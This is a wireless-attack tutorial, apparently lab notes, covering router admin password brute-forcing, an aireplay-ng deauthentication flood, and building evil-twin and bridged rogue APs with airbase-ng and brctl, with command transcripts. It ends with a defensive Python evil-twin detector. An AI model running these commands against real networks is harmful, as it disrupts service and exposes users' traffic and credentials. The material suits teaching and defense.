Cracking the AP's default account
The admin web page of some routers uses a default account/password such as admin or 123456.
Even when that is not the case, the login password is usually fairly simple: capture and analyze the login traffic, then write code to brute-force it.
Test case: simulated login to the web page of a FAST (迅捷) home router
Denial of service attack
aireplay-ng -0 -a ap_mac -c victim_mac wlan0mon
Evil twin and AP MAC address spoofing attacks
Evil twin (cloned AP) attack: deploy an attacker-controlled AP near the targeted WLAN with the same {SSID, BSSID, channel, frequency}.
root@yue:~# airbase-ng --help
Airbase-ng 1.5.2 - (C) 2008-2018 Thomas d'Otreppe
Original work: Martin Beck
https://www.aircrack-ng.org
usage: airbase-ng <options> <replay interface>
Options:
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
-n hex : User specified ANonce when doing the 4-way handshake
Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file
--help : Displays this usage screen
root@yue:~# airbase-ng -a C8:3A:35:A7:A6:50 --essid Tenda_A7A650 -c 13 wlan1mon
21:45:12 Created tap interface at0
21:45:12 Trying to set MTU on at0 to 1500
21:45:12 Access Point with BSSID C8:3A:35:A7:A6:50 started.
Rogue AP
An AP that is connected, without authorization, to a network that requires authorization to access.
In the vast majority of cases a rogue AP is configured with open authentication and no encryption at all.
Deploying a rogue AP
- Deploy a real physical device inside the authorized network as the rogue AP. This compromises not only wireless security but also the physical security of the authorized network.
- Create the rogue AP in software and bridge it to the local Ethernet segment of the authorized network.
Setting up a rogue AP in software
- Use airbase-ng to create the AP
root@yue:~# airbase-ng -a AB:CD:EF:12:34:56 --essid ap_test -c 10 wlan1mon
16:32:23 Created tap interface at0
16:32:23 Trying to set MTU on at0 to 1500
16:32:23 Trying to set MTU on wlan1mon to 1800
ti_set_mac failed: Cannot assign requested address
You most probably want to set the MAC of your TAP interface.
ifconfig <iface> hw ether AB:CD:EF:12:34:56
16:32:23 Access Point with BSSID AB:CD:EF:12:34:56 started.
- Bridge the Ethernet interface that belongs to the authorized network with the rogue AP interface. On Kali Linux install bridge-utils and create the network interface wifi_bridge:
root@yue:~# brctl addbr wifi_bridge
root@yue:~# iwconfig
wifi_bridge no wireless extensions.
at0 no wireless extensions.
eth0 no wireless extensions.
wlan1mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
- Add the Ethernet interface and the virtual interface at0 created by airbase-ng to the bridge
root@yue:~# brctl addif wifi_bridge eth0
root@yue:~# brctl addif wifi_bridge at0
- Bring up the eth0 and at0 interfaces without assigning them an IP address (the commands below do this; the bridge itself is brought up last)
root@yue:~# ifconfig eth0 0.0.0.0 up
root@yue:~# ifconfig at0 0.0.0.0 up
- Enable IP forwarding
root@yue:~# echo 1 > /proc/sys/net/ipv4/ip_forward
- Bring up the bridge
root@yue:~# ifconfig wifi_bridge up
Wireless clients that connect to the rogue AP will now receive IP addresses from the DHCP server inside the authorized WLAN.
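A defender-side check for the evil twin and rogue AP scenarios above, added here as an example (it is not code from the original notes or from aircrack-ng): it compares observed beacons against an allowlist of authorized APs and flags a known SSID advertised by a foreign BSSID, a known BSSID on the wrong channel or with changed security, and unknown open networks. The allowlist and the scan records are constructed sample data; only the BSSID values are taken from the airbase-ng sessions on this page.

```python
from dataclasses import dataclass
# Constructed allowlist of authorized APs (assumed): SSID -> {BSSID -> (channel, security)}
AUTHORIZED = {
    "Tenda_A7A650": {"c8:3a:35:a7:a6:50": (13, "WPA2")},
    "corp-wifi": {"00:11:22:33:44:55": (6, "WPA2"), "00:11:22:33:44:66": (11, "WPA2")},
}

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # "OPEN", "WEP", "WPA" or "WPA2"
def classify(b):
    """Return (severity, reason) when a beacon contradicts the allowlist, else None."""
    bssid = b.bssid.lower()
    known = AUTHORIZED.get(b.ssid)
    if known is None:
        # Not one of our SSIDs: an open network is a rogue-AP candidate, the rest are neighbours
        return ("medium", "unknown open SSID, possible rogue AP") if b.security == "OPEN" else None
    if bssid not in known:
        # Our SSID from a BSSID we do not own: evil twin (usually also open)
        return ("high", f"SSID advertised by unlisted BSSID {bssid} ({b.security})")
    chan, sec = known[bssid]
    if b.channel != chan:
        # Our BSSID on the wrong channel: cloned BSSID (MAC spoofing) or an unplanned change
        return ("high", f"authorized BSSID on channel {b.channel}, expected {chan}")
    if b.security != sec:
        return ("high", f"authorized BSSID advertising {b.security}, expected {sec}")
    return None

def scan_alerts(beacons):
    """Deduplicated (severity, ssid, bssid, reason) alerts for a batch of beacons."""
    alerts = []
    for b in beacons:
        verdict = classify(b)
        if verdict:
            alert = (verdict[0], b.ssid, b.bssid.lower(), verdict[1])
            if alert not in alerts:
                alerts.append(alert)
    return alerts

# Constructed scan results; the BSSIDs reuse the values from the airbase-ng sessions above.
SAMPLE = [
    Beacon("Tenda_A7A650", "C8:3A:35:A7:A6:50", 13, "WPA2"),  # the real AP
    Beacon("Tenda_A7A650", "C8:3A:35:A7:A6:50", 1, "OPEN"),   # cloned BSSID on another channel
    Beacon("corp-wifi", "AA:BB:CC:DD:EE:FF", 6, "OPEN"),      # foreign BSSID using our SSID
    Beacon("neighbour-5G", "DE:AD:BE:EF:00:01", 36, "WPA2"),  # benign neighbour
    Beacon("ap_test", "AB:CD:EF:12:34:56", 10, "OPEN"),       # unknown open SSID
]
```

Feed it the SSID/BSSID/channel/security columns of a wireless scan taken on site; a beacon for one of your own SSIDs from a BSSID you do not own is the signature of the evil twin described above.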